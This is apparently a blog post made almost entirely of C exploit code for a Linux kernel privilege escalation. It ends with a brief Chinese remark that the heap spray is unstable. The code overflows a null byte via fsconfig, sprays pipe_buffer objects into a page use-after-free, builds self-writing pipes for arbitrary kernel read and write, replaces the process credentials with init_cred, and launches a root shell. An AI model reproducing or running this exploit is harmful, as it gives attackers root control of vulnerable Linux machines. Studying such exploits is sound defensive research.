void info(char *msg)
{
printf("\033[34m\033[1m[*] %s\033[0m\n", msg);
}
void hexx(char *msg, size_t value)
{
printf("\033[32m\033[1m[+] %s: \033[0m%#llx\n", msg, value);
}
void binary_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("\033[33m[*] %s:\n\033[0m", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}
void bind_core(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}
struct page;
struct pipe_inode_info;
struct pipe_buf_operations;
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
#define SPRAY_PIPE_NUMS 0xF0
#define S_PIPE_BUF_SZ 96
#define T_PIPE_BUF_SZ 192
int pipe_fd[SPRAY_PIPE_NUMS][2];
int orig_idx = -1, victim_idx = -1;
int snd_orig_idx = -1, snd_victim_idx = -1;
int self_1_pipe_idx = -1, self_2_pipe_idx = -1, self_3_pipe_idx = -1;
struct pipe_buffer self_pipe_buf;
struct pipe_buffer self_1_pipe_buf, self_2_pipe_buf, self_3_pipe_buf;
void construct_first_level_page_uaf()
{
info("Step I - construct first level page uaf");
int fs_fd;
puts("[+] spray pipe_buffer from kmalloc-1k [no cg]");
for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
{
if (pipe(pipe_fd[i]) < 0)
err_exit("FAILED to pipe()");
}
puts("[+] fcntl() to spray pipe_buffer from kmalloc-4k [no cg]");
for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
{
if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0)
err_exit("FAILED to fcntl() - 4k");
write(pipe_fd[i][1], "XiaozaYa", 8);
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], "AAAAAAAX", 8);
write(pipe_fd[i][1], "BBBBBBBX", 8);
if (i == SPRAY_PIPE_NUMS / 2)
{
puts("[+] fsopen() a ext4 filesystem and fsconfig() to write 4095 bytes");
if ((fs_fd = fsopen("ext4", 0)) <= 0)
perror("fsopen"), err_exit("FAILED to fsopen()");
for (int j = 0; j < 273; j++)
{
fsconfig(fs_fd, FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
}
}
}
puts("[+] overflow write null byte to construct SAME PAGE");
if (fsconfig(fs_fd, FSCONFIG_SET_FLAG, "\x00", NULL, 0) < 0)
perror("fsconfig"), err_exit("FAILED to trigger overflaow write null byte");
puts("[+] CHECK WETHER HIT");
for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
{
int nr;
char tag[0x10] = { 0 };
read(pipe_fd[i][0], tag, 8);
read(pipe_fd[i][0], &nr, sizeof(int));
if (!strcmp(tag, "XiaozaYa") && nr != i)
{
orig_idx = nr;
victim_idx = i;
}
}
if (victim_idx == -1)
err_exit("FAILED to hit");
hexx("orig_idx", orig_idx);
hexx("victim_idx", victim_idx);
puts("");
}
void construct_second_level_page_uaf()
{
info("Step II - construct second level page uaf");
size_t buf[0x1000] = { 0 };
size_t t_pipe_sz = 0x1000 * (S_PIPE_BUF_SZ/sizeof(struct pipe_buffer));
write(pipe_fd[victim_idx][1], buf, S_PIPE_BUF_SZ*2 - sizeof(int)*3 - 24);
read(pipe_fd[victim_idx][0], buf, S_PIPE_BUF_SZ - sizeof(int) - 8);
close(pipe_fd[orig_idx][0]);
close(pipe_fd[orig_idx][1]);
puts("[+] fcntl() to spray pipe_buffer from kmalloc-96 [no cg]");
for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
{
if (i == victim_idx || i == orig_idx) continue;
if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, t_pipe_sz) < 0)
err_exit("FAILED to fcntl()");
}
puts("[+] CHECK WETHER HIT UAF PAGE");
read(pipe_fd[victim_idx][0], &self_pipe_buf, sizeof(struct pipe_buffer));
if (self_pipe_buf.page < 0xffff000000000000)
err_exit("FAILED to hit UAF PAGE");
hexx("pipe_buffer.page", self_pipe_buf.page);
hexx("pipe_buffer.offset", self_pipe_buf.offset);
hexx("pipe_buffer.len", self_pipe_buf.len);
hexx("pipe_buffer.ops", self_pipe_buf.ops);
hexx("pipe_buffer.flags", self_pipe_buf.flags);
hexx("pipe_buffer.private", self_pipe_buf.private);
write(pipe_fd[victim_idx][1], &self_pipe_buf, sizeof(struct pipe_buffer));
puts("[+] CHECK WETHER HIT");
for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
{
int nr;
if (i == victim_idx || i == orig_idx) continue;
read(pipe_fd[i][0], &nr, sizeof(int));
if (nr < SPRAY_PIPE_NUMS && nr != i)
{
snd_orig_idx = nr;
snd_victim_idx = i;
}
}
if (snd_victim_idx == -1)
err_exit("FAILED to hit");
hexx("snd_orig_idx", snd_orig_idx);
hexx("snd_victim_idx", snd_victim_idx);
puts("");
}
void construct_self_writing_pipe()
{
info("Step III - construct self writing pipe by second level page UAF");
size_t buf[0x1000] = { 0 };
struct pipe_buffer evil_pipe_buf;
struct page* page_ptr;
int t_pipe_sz = 0x1000 * (T_PIPE_BUF_SZ/sizeof(struct pipe_buffer));
write(pipe_fd[snd_victim_idx][1], buf, T_PIPE_BUF_SZ - sizeof(int)*3 - 24);
close(pipe_fd[snd_orig_idx][0]);
close(pipe_fd[snd_orig_idx][1]);
puts("[+] fcntl() to spray pipe_buffer from kmalloc-192 [no cg]");
for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
{
if (i == victim_idx || i == orig_idx || i == snd_victim_idx || i == snd_orig_idx) continue;
if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, t_pipe_sz) < 0)
err_exit("FAILED to fcntl()");
}
puts("[+] CHECK WETHER HIT UAF PAGE AND HIJACK PIPE_BUFFER TO SELF_PIPE_BUF");
puts("[+] construct self writing pipe 1");
memcpy(&evil_pipe_buf, &self_pipe_buf, sizeof(struct pipe_buffer));
evil_pipe_buf.offset = T_PIPE_BUF_SZ;
evil_pipe_buf.len = T_PIPE_BUF_SZ;
write(pipe_fd[snd_victim_idx][1], &evil_pipe_buf, sizeof(struct pipe_buffer));
page_ptr = NULL;
for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
{
if (i == victim_idx || i == orig_idx || i == snd_victim_idx || i == snd_orig_idx) continue;
read(pipe_fd[i][0], &page_ptr, sizeof(struct page*));
if ((size_t)page_ptr == (size_t)(self_pipe_buf.page))
{
self_1_pipe_idx = i;
break;
}
}
if (self_1_pipe_idx == -1)
err_exit("FAILED to hit");
hexx("self_1_pipe_idx", self_1_pipe_idx);
puts("[+] construct self writing pipe 2");
write(pipe_fd[snd_victim_idx][1], buf, T_PIPE_BUF_SZ - sizeof(struct pipe_buffer));
write(pipe_fd[snd_victim_idx][1], &evil_pipe_buf, sizeof(struct pipe_buffer));
page_ptr = NULL;
for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
{
if (i == victim_idx || i == orig_idx || i == snd_victim_idx || i == snd_orig_idx || i == self_1_pipe_idx) continue;
read(pipe_fd[i][0], &page_ptr, sizeof(struct page*));
if ((size_t)page_ptr == (size_t)(self_pipe_buf.page))
{
self_2_pipe_idx = i;
break;
}
}
if (self_2_pipe_idx == -1)
err_exit("FAILED to hit");
hexx("self_2_pipe_idx", self_2_pipe_idx);
puts("[+] construct self writing pipe 3");
write(pipe_fd[snd_victim_idx][1], buf, T_PIPE_BUF_SZ - sizeof(struct pipe_buffer));
write(pipe_fd[snd_victim_idx][1], &evil_pipe_buf, sizeof(struct pipe_buffer));
page_ptr = NULL;
for (int i = 0; i < SPRAY_PIPE_NUMS; i++)
{
if (i == victim_idx || i == orig_idx || i == snd_victim_idx || i == snd_orig_idx || i == self_1_pipe_idx || i == self_2_pipe_idx) continue;
read(pipe_fd[i][0], &page_ptr, sizeof(struct page*));
if ((size_t)page_ptr == (size_t)(self_pipe_buf.page))
{
self_3_pipe_idx = i;
}
}
if (self_3_pipe_idx == -1)
err_exit("FAILED to hit");
hexx("self_3_pipe_idx", self_3_pipe_idx);
puts("");
}
void setup_self_writing_pipe()
{
info("Step IV - setup self writing pipe system");
memcpy(&self_1_pipe_buf, &self_pipe_buf, sizeof(struct pipe_buffer));
memcpy(&self_2_pipe_buf, &self_pipe_buf, sizeof(struct pipe_buffer));
memcpy(&self_3_pipe_buf, &self_pipe_buf, sizeof(struct pipe_buffer));
self_2_pipe_buf.offset = T_PIPE_BUF_SZ * 3;
self_2_pipe_buf.len = 0;
self_3_pipe_buf.offset = T_PIPE_BUF_SZ;
self_3_pipe_buf.len = 0;
write(pipe_fd[self_3_pipe_idx][1], &self_2_pipe_buf, sizeof(struct pipe_buffer));
}
void arb_read(struct page* page_ptr, void* dst, size_t len)
{
char buf[T_PIPE_BUF_SZ] = { 0 };
self_1_pipe_buf.page = page_ptr;
self_1_pipe_buf.offset = 0;
self_1_pipe_buf.len = 0x1000;
write(pipe_fd[self_2_pipe_idx][1], &self_3_pipe_buf, sizeof(struct pipe_buffer));
write(pipe_fd[self_3_pipe_idx][1], &self_1_pipe_buf, sizeof(struct pipe_buffer));
write(pipe_fd[self_3_pipe_idx][1], buf, T_PIPE_BUF_SZ - sizeof(struct pipe_buffer));
write(pipe_fd[self_3_pipe_idx][1], &self_2_pipe_buf, sizeof(struct pipe_buffer));
read(pipe_fd[self_1_pipe_idx][0], dst, len);
}
void arb_write(struct page* page_ptr, void* src, size_t len)
{
char buf[T_PIPE_BUF_SZ] = { 0 };
self_1_pipe_buf.page = page_ptr;
self_1_pipe_buf.offset = 0;
self_1_pipe_buf.len = 0;
write(pipe_fd[self_2_pipe_idx][1], &self_3_pipe_buf, sizeof(struct pipe_buffer));
write(pipe_fd[self_3_pipe_idx][1], &self_1_pipe_buf, sizeof(struct pipe_buffer));
write(pipe_fd[self_3_pipe_idx][1], buf, T_PIPE_BUF_SZ - sizeof(struct pipe_buffer));
write(pipe_fd[self_3_pipe_idx][1], &self_2_pipe_buf, sizeof(struct pipe_buffer));
write(pipe_fd[self_1_pipe_idx][1], src, len);
}
void get_root_shell()
{
info("Pwn Root Root Pwn");
size_t buf[0x1000];
puts("[+] leak vmemmap base and kernel_offset by arb_read");
vmemmap_base = (size_t)self_pipe_buf.page & 0xfffffffff0000000;
int f = 10;
for (;;)
{
arb_read(vmemmap_base+157*0x40, buf, 8);
if (f)
{
hexx("data", buf[0]);
f--;
}
if (buf[0] > 0xffffffff81000000 && (buf[0]&0xfff) == 0x040)
{
kernel_base = buf[0] - 0x040;
kernel_offset = kernel_base - 0xffffffff81000000;
break;
}
vmemmap_base -= 0x10000000;
}
hexx("vmemmap_base", vmemmap_base);
hexx("kernel_base", kernel_base);
hexx("kernel_offset", kernel_offset);
puts("[+] search current task_struct");
uint64_t parent_task, current_task;
uint64_t* comm_addr = NULL;
size_t base = 0xffff000000000000;
for (int i = 0; 1; i++)
{
memset(buf, 0, sizeof(buf));
arb_read(vmemmap_base+i*0x40, buf, 0xff0);
comm_addr = memmem(buf, 0xff0, "XiaozaYaPwner", 0xd);
if (comm_addr && comm_addr[-2] > base && comm_addr[-3] > base && comm_addr[-56] > base && comm_addr[-55] > base)
{
parent_task = comm_addr[-56];
current_task = comm_addr[-49] - 0x960;
page_offset_base = (comm_addr[-49]&0xfffffffffffff000) - i*0x1000;
page_offset_base &= 0xfffffffff0000000;
break;
}
}
hexx("parent_task", parent_task);
hexx("current_task", current_task);
hexx("page_offset_base", page_offset_base);
puts("[+] replace current cred with init_cred by arb_write");
init_task = 0xffffffff8281a940 + kernel_offset;
init_cred = 0xffffffff8286b7a0 + kernel_offset;
init_nsproxy = 0xffffffff8286b560 + kernel_offset;
hexx("init_task", init_task);
hexx("init_cred", init_cred);
hexx("init_nsproxy", init_nsproxy);
size_t current_task_page = direct_map_addr_to_page_addr(current_task);
arb_read(current_task_page, buf, 0xff0);
arb_read(current_task_page+0x40, &buf[512], 0xff0);
size_t* tsk_buf = (size_t*)((char*)buf + (current_task&0xfff));
tsk_buf[346] = init_cred;
tsk_buf[347] = init_cred;
tsk_buf[360] = init_nsproxy;
arb_write(current_task_page, buf, 0xff0);
arb_write(current_task_page+0x40, &buf[512], 0xff0);
hexx("UID", getuid());
system("/bin/sh");
}
int main(int argc, char** argv, char** envp)
{
bind_core(0);
if (prctl(PR_SET_NAME, "XiaozaYaPwner", 0, 0, 0) != 0)
err_exit("FAILED to change process name");
unshare(CLONE_NEWNS|CLONE_NEWUSER);
construct_first_level_page_uaf();
construct_second_level_page_uaf();
construct_self_writing_pipe();
setup_self_writing_pipe();
get_root_shell();
puts("[+] EXP NEVER END");
return 0;
}
效果如下:
总结:
自己的堆喷技巧不行,堆喷的效果非常差,非常不稳定,哎,还是多看看别人的 exp 好好学习吧